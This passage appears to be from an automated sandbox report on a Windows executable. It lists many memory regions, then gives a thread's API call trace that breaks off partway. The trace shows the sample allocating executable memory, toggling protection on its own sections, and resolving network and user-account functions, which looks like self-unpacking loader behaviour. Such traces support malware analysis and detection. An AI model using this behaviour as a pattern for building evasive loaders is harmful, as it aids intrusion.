	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4293
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4294
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4295
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4296
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4297
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4298
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4299
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4300
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4301
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4302
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4303
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4304
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4305
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4306
	        start_va = 0x4cb0000
	          end_va = 0x4cc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4307
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4308
	        start_va = 0x6b80000
	          end_va = 0x6c5ffff
	     entry_point = 0x6b80000
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 4309
	        start_va = 0x6fdb0000
	          end_va = 0x6fdbefff
	     entry_point = 0x6fdb0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll")

Region:
	              id = 4310
	        start_va = 0x6f7e0000
	          end_va = 0x6f823fff
	     entry_point = 0x6f7e0000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll")

Region:
	              id = 4311
	        start_va = 0x37c00000
	          end_va = 0x37cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000037c00000"
	        filename = ""

Region:
	              id = 4312
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4315
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4316
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4317
	        start_va = 0x6f70000
	          end_va = 0x6ff2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4319
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4338
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4339
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4341
	        start_va = 0x6f70000
	          end_va = 0x6ff2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4342
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4343
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4344
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4345
	        start_va = 0x6f70000
	          end_va = 0x6ff2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4346
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4347
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4349
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4350
	        start_va = 0x6f70000
	          end_va = 0x6ff2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4351
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4352
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4353
	        start_va = 0x6f70000
	          end_va = 0x7075fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4354
	        start_va = 0x7080000
	          end_va = 0x71fdfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000007080000"
	        filename = ""

Region:
	              id = 4355
	        start_va = 0x7200000
	          end_va = 0x73fbfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000007200000"
	        filename = ""

Region:
	              id = 4356
	        start_va = 0x6f70000
	          end_va = 0x71e6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4358
	        start_va = 0x71f0000
	          end_va = 0x74edfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000071f0000"
	        filename = ""

Region:
	              id = 4359
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4360
	        start_va = 0x74f0000
	          end_va = 0x786afff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000074f0000"
	        filename = ""

Region:
	              id = 4361
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4362
	        start_va = 0x6f70000
	          end_va = 0x733efff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4363
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4364
	        start_va = 0x7340000
	          end_va = 0x73c2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000007340000"
	        filename = ""

Region:
	              id = 4366
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4367
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4368
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4369
	        start_va = 0x6f70000
	          end_va = 0x6ff2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4370
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4372
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4373
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4374
	        start_va = 0x6fda0000
	          end_va = 0x6fdabfff
	     entry_point = 0x6fda0000
	     region_type = mapped_file
	            name = "perfos.dll"
	        filename = "\\Windows\\SysWOW64\\perfos.dll" (normalized: "c:\\windows\\syswow64\\perfos.dll")

Region:
	              id = 4376
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4377
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4378
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4394
	        start_va = 0x6f70000
	          end_va = 0x6ff2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4395
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4396
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4398
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4399
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4400
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4401
	        start_va = 0x6f70000
	          end_va = 0x6ff2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 4402
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4403
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4405
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4406
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4408
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4410
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4411
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4465
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4466
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4467
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4498
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4499
	        start_va = 0x4fa0000
	          end_va = 0x5022fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fa0000"
	        filename = ""

Region:
	              id = 4500
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4532
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 4540
	        start_va = 0x15b00000
	          end_va = 0x15bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000015b00000"
	        filename = ""

Region:
	              id = 4541
	        start_va = 0x4cb0000
	          end_va = 0x4cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""


Thread:
	id = 107
	os_tid = 0x574

	[0088.398] GetEnvironmentVariableW (in: lpName="a杤畷獧汧晱摩湫p", lpBuffer=0x407c7d, nSize=0xb | out: lpBuffer="p") returned 0x0
	[0088.400] OpenSemaphoreW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0088.400] GetModuleHandleA (lpModuleName="eappcfg.dll") returned 0x6ffa0000
	[0088.400] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x6ffa003c, lpBuffer=0x407ab4, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x407ab4*, lpNumberOfBytesRead=0x0) returned 1
	[0088.400] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x6ffa01a0, lpBuffer=0x407ab4, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x407ab4*, lpNumberOfBytesRead=0x0) returned 1
	[0088.400] SetErrorMode (uMode=0x0) returned 0x2
	[0088.401] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x4a0000
	[0088.401] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x765a0000
	[0088.425] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0088.425] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0088.425] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0088.425] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x4b0000
	[0088.425] VirtualAlloc (lpAddress=0x0, dwSize=0x32e00, flAllocationType=0x1000, flProtect=0x4) returned 0x7b0000
	[0088.430] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x19ff08 | out: lpflOldProtect=0x19ff08*=0x2) returned 1
	[0088.430] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x19ff08 | out: lpflOldProtect=0x19ff08*=0x4) returned 1
	[0088.430] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x80) returned 1
	[0088.465] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x20, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0088.466] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0088.466] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0088.466] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0088.468] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0088.468] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0088.469] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0088.469] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0088.469] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0088.469] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x0
	[0088.469] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x702b0000
	[0088.472] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.472] GetProcAddress (hModule=0x702b0000, lpProcName="HttpQueryInfoA") returned 0x70351880
	[0088.472] GetProcAddress (hModule=0x702b0000, lpProcName="InternetQueryOptionA") returned 0x70357d00
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="InternetSetOptionA") returned 0x70351dc0
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersA") returned 0x7032c3f0
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="InternetCloseHandle") returned 0x7037d200
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="HttpSendRequestA") returned 0x70378e60
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="InternetConnectA") returned 0x703f0da0
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="InternetReadFile") returned 0x70337320
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersW") returned 0x7032bec0
	[0088.473] GetProcAddress (hModule=0x702b0000, lpProcName="InternetOpenW") returned 0x70378490
	[0088.474] GetProcAddress (hModule=0x702b0000, lpProcName="HttpOpenRequestW") returned 0x70330fd0
	[0088.474] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.474] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x74b20000
	[0088.474] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.474] GetProcAddress (hModule=0x74b20000, lpProcName="PathFindFileNameW") returned 0x74b37a50
	[0088.474] GetProcAddress (hModule=0x74b20000, lpProcName="StrCatW") returned 0x74b484a0
	[0088.474] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyW") returned 0x74b484e0
	[0088.474] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpIW") returned 0x74b34750
	[0088.474] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyNW") returned 0x74b433f0
	[0088.474] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrA") returned 0x74b43570
	[0088.474] GetProcAddress (hModule=0x74b20000, lpProcName="StrDupW") returned 0x74b39060
	[0088.475] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrIW") returned 0x74b381b0
	[0088.475] GetProcAddress (hModule=0x74b20000, lpProcName="StrRChrW") returned 0x74b3d1c0
	[0088.475] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpW") returned 0x74b35fe0
	[0088.475] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.475] GetModuleHandleA (lpModuleName="PSAPI.DLL") returned 0x0
	[0088.475] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x772c0000
	[0088.477] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.478] GetProcAddress (hModule=0x772c0000, lpProcName="GetProcessImageFileNameA") returned 0x772c16a0
	[0088.478] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.478] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0088.478] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.478] GetProcAddress (hModule=0x77960000, lpProcName="_chkstk") returned 0x779da570
	[0088.478] GetProcAddress (hModule=0x77960000, lpProcName="RtlAllocateHeap") returned 0x77992bd0
	[0088.478] GetProcAddress (hModule=0x77960000, lpProcName="RtlFreeHeap") returned 0x77990230
	[0088.478] GetProcAddress (hModule=0x77960000, lpProcName="memset") returned 0x779dcfe0
	[0088.478] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.478] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x0
	[0088.478] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x701e0000
	[0088.505] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.506] GetProcAddress (hModule=0x701e0000, lpProcName="CreateEnvironmentBlock") returned 0x701e4480
	[0088.506] GetProcAddress (hModule=0x701e0000, lpProcName="GetProfilesDirectoryW") returned 0x701e45a0
	[0088.506] GetProcAddress (hModule=0x701e0000, lpProcName="DestroyEnvironmentBlock") returned 0x701e4510
	[0088.506] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.506] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x746c0000
	[0088.506] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.506] GetProcAddress (hModule=0x746c0000, lpProcName=0x34) returned 0x746f1110
	[0088.506] GetProcAddress (hModule=0x746c0000, lpProcName=0x2) returned 0x746d3230
	[0088.506] GetProcAddress (hModule=0x746c0000, lpProcName=0x3) returned 0x746cead0
	[0088.506] GetProcAddress (hModule=0x746c0000, lpProcName=0xb) returned 0x746c5240
	[0088.506] GetProcAddress (hModule=0x746c0000, lpProcName=0x17) returned 0x746ce6b0
	[0088.507] GetProcAddress (hModule=0x746c0000, lpProcName=0xf) returned 0x746c4a90
	[0088.507] GetProcAddress (hModule=0x746c0000, lpProcName=0x73) returned 0x746c6520
	[0088.507] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.507] GetModuleHandleA (lpModuleName="WINHTTP.dll") returned 0x0
	[0088.507] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x70210000
	[0088.509] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.509] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryDataAvailable") returned 0x702347a0
	[0088.509] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReceiveResponse") returned 0x7021c8e0
	[0088.509] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpen") returned 0x70246720
	[0088.509] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpAddRequestHeaders") returned 0x70229400
	[0088.510] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryHeaders") returned 0x702309c0
	[0088.510] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReadData") returned 0x70234ea0
	[0088.510] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpenRequest") returned 0x70248dd0
	[0088.510] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSetOption") returned 0x702306f0
	[0088.510] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpCloseHandle") returned 0x70233ad0
	[0088.510] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSendRequest") returned 0x7023bfd0
	[0088.510] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpConnect") returned 0x70242880
	[0088.510] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.510] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x0
	[0088.510] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77490000
	[0088.512] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.512] GetProcAddress (hModule=0x77490000, lpProcName="NetApiBufferFree") returned 0x6ff916d0
	[0088.512] GetProcAddress (hModule=0x77490000, lpProcName="NetUserGetInfo") returned 0x6ff733a0
	[0088.513] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.514] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765a0000
	[0088.514] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.514] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtectEx") returned 0x765e2790
